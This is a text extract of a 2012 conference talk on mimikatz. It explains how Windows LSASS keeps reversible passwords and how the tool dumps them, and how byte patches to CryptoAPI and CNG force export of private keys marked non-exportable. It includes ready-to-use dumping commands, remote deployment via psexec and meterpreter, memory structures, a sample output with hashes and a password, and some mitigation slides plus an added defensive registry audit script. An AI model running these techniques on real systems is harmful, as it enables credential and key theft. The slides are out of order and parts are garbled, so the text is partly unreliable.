kerberos (nt6)  kerberos!KerbGlobalLogonSessionTable      RTL_AVL_TABLE
msv1_0          lsasrv!LogonSessionList                   LIST_ENTRY
                lsasrv!LogonSessionListCount              ULONG

Protection Keys

Key    NT 5 symbols
RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key    NT 6 symbols
       lsasrv!InitializationVector
3DES   lsasrv!h3DesKey
AES    lsasrv!hAesKey
mimikatz :: sekurlsa – memo

Some commands:
  mimikatz privilege::debug sekurlsa::logonPasswords full exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC) – Traitement du Kiwi (Aug 2 2012 01:32:28) – http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
    msv1_0   : Utilisateur : Gentil Kiwi  Domaine : vm-w8-rp-x  Hash LM : d0e9aee149655a6075e4540af1f22d3b  Hash NTLM : cc36cf7a8514893efccd332446158b1a
    kerberos : Utilisateur : Gentil Kiwi  Domaine : vm-w8-rp-x  Mot de passe : waza1234
    wdigest  : Utilisateur : Gentil Kiwi  Domaine : vm-w8-rp-x  Mot de passe : waza1234
    tspkg    : Utilisateur : Gentil Kiwi  Domaine : vm-w8-rp-x  Mot de passe : waza1234
    livessp  : n.t. (LUID KO)
mimikatz :: sekurlsa – what can we do?

Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash leaves traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks

More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
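As an added example for the "Disable NTLM" and "Disable faulty providers" items (not from the slides, not mimikatz code), here is a small Python audit that reads the relevant HKLM settings on a Windows host and reports which of them are still weak. The policy logic lives in `evaluate()` over a plain dict so it can run and be tested anywhere; `read_live_settings()` uses `winreg` and only works on Windows. The registry paths and value names are real Windows settings; the thresholds (deny-all NTLM, `LmCompatibilityLevel` 5) are my choice, and `UseLogonCredential` is a later Microsoft control for the WDigest plaintext problem (Windows 8.1 / KB2871997) that the 2012 slides do not mention. The two sample dicts are constructed.

```python
"""
Added example (not from the slides): audit the NTLM / security-provider
hardening items of the slide on a Windows host. evaluate() is pure policy
logic over a dict; read_live_settings() collects the dict from HKLM.
"""
import sys
from typing import Any, Dict, List

# HKLM relative paths of the real Windows values this audit looks at.
HKLM_PATHS = {
    "Security Packages":            r"SYSTEM\CurrentControlSet\Control\Lsa",
    "LmCompatibilityLevel":         r"SYSTEM\CurrentControlSet\Control\Lsa",
    "RestrictSendingNTLMTraffic":   r"SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0",
    "RestrictReceivingNTLMTraffic": r"SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0",
    # Later Microsoft control (Windows 8.1 / KB2871997), not on the slides.
    "UseLogonCredential":           r"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest",
}

# Security packages the slides show keeping a reversible password in LSASS.
REVERSIBLE_PROVIDERS = {"wdigest", "tspkg", "livessp"}


def _dword(settings: Dict[str, Any], name: str, default: int) -> int:
    """Read a DWORD-like value, treating a missing value as `default`."""
    value = settings.get(name)
    return default if value is None else int(value)


def evaluate(settings: Dict[str, Any]) -> List[str]:
    """Return one finding per weak setting; an empty list means every check passed."""
    findings: List[str] = []
    loaded = {p.lower() for p in (settings.get("Security Packages") or []) if p}
    for pkg in sorted(loaded & REVERSIBLE_PROVIDERS):
        findings.append(f"security package '{pkg}' is loaded: it keeps a reversible password in LSASS")
    # Restrict NTLM policies: 0 = allow all, 1 = audit / deny domain accounts, 2 = deny all
    if _dword(settings, "RestrictSendingNTLMTraffic", 0) < 2:
        findings.append("outgoing NTLM not blocked: RestrictSendingNTLMTraffic < 2")
    if _dword(settings, "RestrictReceivingNTLMTraffic", 0) < 2:
        findings.append("incoming NTLM not blocked: RestrictReceivingNTLMTraffic < 2")
    # LmCompatibilityLevel 5 = send NTLMv2 only, refuse LM and NTLM
    if _dword(settings, "LmCompatibilityLevel", 0) < 5:
        findings.append("LmCompatibilityLevel < 5: LM/NTLMv1 responses may still be sent")
    # Only an explicit 0 guarantees WDigest does not keep the plaintext; the
    # meaning of a missing value depends on the Windows version, so flag it.
    if settings.get("UseLogonCredential") != 0:
        findings.append("WDigest UseLogonCredential is not explicitly 0")
    return findings


def read_live_settings() -> Dict[str, Any]:
    """Collect the values from HKLM (Windows only); missing values map to None."""
    import winreg  # imported here so the module still loads on non-Windows hosts
    settings: Dict[str, Any] = {}
    for name, path in HKLM_PATHS.items():
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
                settings[name] = winreg.QueryValueEx(key, name)[0]
        except OSError:
            settings[name] = None
    return settings


# Constructed sample: roughly what a default Windows host of the talk's era reports.
SAMPLE_DEFAULT = {
    "Security Packages": ["kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u"],
    "LmCompatibilityLevel": None,
    "RestrictSendingNTLMTraffic": None,
    "RestrictReceivingNTLMTraffic": None,
    "UseLogonCredential": None,
}

# Constructed sample: the same host after the slide's "more in depth" items.
SAMPLE_HARDENED = {
    "Security Packages": ["kerberos", "msv1_0", "schannel", "pku2u"],
    "LmCompatibilityLevel": 5,
    "RestrictSendingNTLMTraffic": 2,
    "RestrictReceivingNTLMTraffic": 2,
    "UseLogonCredential": 0,
}

if __name__ == "__main__":
    current = read_live_settings() if sys.platform == "win32" else SAMPLE_DEFAULT
    for line in evaluate(current) or ["no findings"]:
        print(line)
```

On a non-Windows machine the script evaluates the constructed default sample and prints six findings; on the hardened sample it prints nothing. The point of keeping `evaluate()` separate is that the same policy can be fed from a registry export or a configuration baseline, not only from the live host.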
mimikatz :: crypto – what is it?

A little module (mod_mimikatz_crypto) that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • Even those which are “not” exportable

What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
mimikatz :: crypto – how is it protected?

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least without the master keys and/or the users' passwords

Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a “session”

Export/Usage can be limited by:
– Password   } constraint for most users,
– Popup      } unavailable for computer keys
– Export/Archive flag not present

  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi – how it works

“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.” – http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …

Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi – how it's exported (… level)

Diagram (everything happens inside the calling process, with CryptoAPI and the RSA CSP): Ask to export Key → Load Private Key → DPAPI Decode → Exportable? → yes: Exported Key / no: NTE_BAD_KEY_STATE. [PLAYSKOOL]
mimikatz :: crypto :: patch – capi – because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export, and checks if the key is exportable.

mimikatz # crypto::exportCertificates
Emplacement : CERT_SYSTEM_STORE_CURRENT_USER\My
 - Benjamin Delpy
    Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider       : Microsoft Enhanced Cryptographic Provider v1.0
    Type           : AT_KEYEXCHANGE
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
    Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

(Exportable? No.)
mimikatz :: crypto :: patch – capi – because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!

I wrote “4” bytes in my memory space:

.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
   patched to:
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
   patched to:
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patch – capi – demo time!

Import, export, import as not exportable…, export!
mimikatz :: crypto :: patch – capi – limitations

Because:
– I'm lazy
– I've seen RSA keys in the majority of real-life cases
  • Elliptic Curve a little…

mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng – how it works

“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.” – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.”

This time key operations are not made in the “user” process context.
Processes use RPC to call “Key isolation service” (keyiso) functions.

It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng – how it's exported (… level)

Diagram: the process calls CNG, which goes through RPC to the KeyIso service (LSASS process): Ask to export Key → Load Private Key → DPAPI Decode → Exportable? → yes: Exported Key / no: NTE_NOT_SUPPORTED. [PLAYSKOOL]
On NT6, LSASS is a system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP.
mimikatz :: crypto :: patch – cng – because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export, and checks if the key is exportable.

mimikatz # crypto::exportKeys
[user] Clés CNG
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.

(Exportable? No.)
mimikatz :: crypto :: patch – cng – because sometimes I own LSASS

This time checks and keys are in the LSASS process… And what?

I wrote “1” byte in LSASS memory space…

.text:6C815210 75 1C    jnz short continue_key_export
   patched to:
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patch – cng – demo time!

Import, export, import as not exportable…, export again!
mimikatz :: crypto :: patch – cng – limitations

Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM

mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz :: crypto :: patch – cng – bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart

Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil

Before the patch:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After the patch:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto – memo

Some commands:
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
  mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
– PFX files are protected by this password: mimikatz

Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz :: sekurlsa :: livessp / workflow
LsaEnumerateLogonSessions
  for each LUID:
    livessp!LiveGlobalLogonSessionList: search the linked list for the LUID
    → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL
    → LsaUnprotectMemory(Password) → password in clear

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's login with a normal account.
After credentials protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

Stacks caught by the LsaProtectMemory breakpoint (kc 5):

lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  ← Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  ← Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) / workflow
LsaEnumerateLogonSessions
  for each LUID:
    kerberos!KerbGlobalLogonSessionTable: RtlLookupElementGenericTableAvl on the LUID
    → KIWI_KERBEROS_PRIMARY_CREDENTIAL
    → LsaUnprotectMemory(Password) → password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) / workflow
LsaEnumerateLogonSessions
  for each LUID:
    kerberos!KerbLogonSessionList: search the linked list for the LUID
    → KIWI_KERBEROS_LOGON_SESSION
    → LsaUnprotectMemory(Password) → password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa / demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos / "hu?"
Ok! It works…
But why?
Not at all logons on NT5 (can need an unlock).
From my understanding of Microsoft explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…
– For password auth:
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth:
  • No password on client
  • No hash on client…
    – NTLM hash on client…
    – the KDC sent it back as a gift!
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, to be usable.
We used LsaUnprotectMemory in the LSASS context to decrypt them:
– this function relies on LsaEncryptMemory from lsasrv.dll.
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process, to take advantage of its keys when we called it.
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can load lsasrv.dll too and "import" the keys LSASS initialized:
– when we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS.
mimikatz :: sekurlsa / LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESX
[Diagram: lsasrv loaded in lsass holds the key material; mimikatz loads its own lsasrv and copies it over]
In lsass / lsasrv:
– g_cbRandomKey: DWORD (256)
– g_pRandomKey → BYTE[g_cbRandomKey]
– g_pDESXKey → BYTE[144]
– g_Feedback: BYTE[8]
copy… → the same symbols in the lsasrv loaded by mimikatz
mimikatz :: sekurlsa / LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
[Diagram: lsasrv loaded in lsass holds the IV and the two BCrypt key handles; mimikatz copies them into its own lsasrv]
In lsass / lsasrv:
– InitializationVector: BYTE[16]
– h3DesKey → KIWI_BCRYPT_KEY
– hAesKey → KIWI_BCRYPT_KEY
copy… → mimikatz

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
mimikatz :: sekurlsa / memo
Security Packages
Package          Symbols                                                   Type
tspkg            tspkg!TSGlobalCredTable                                   RTL_AVL_TABLE
wdig    est          wdigest!l_LogSessList                                     LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList                        LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList                             LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                      RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount    LIST_ENTRY / ULONG

Protection Keys
Key     NT 5 symbols
RC4     lsasrv!g_cbRandomKey / lsasrv!g_pRandomKey
DESX    lsasrv!g_pDESXKey / lsasrv!g_Feedback

Key     NT 6 symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey

Some commands:
mimikatz "privilege::debug" "sekurlsa::logonPasswords full" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
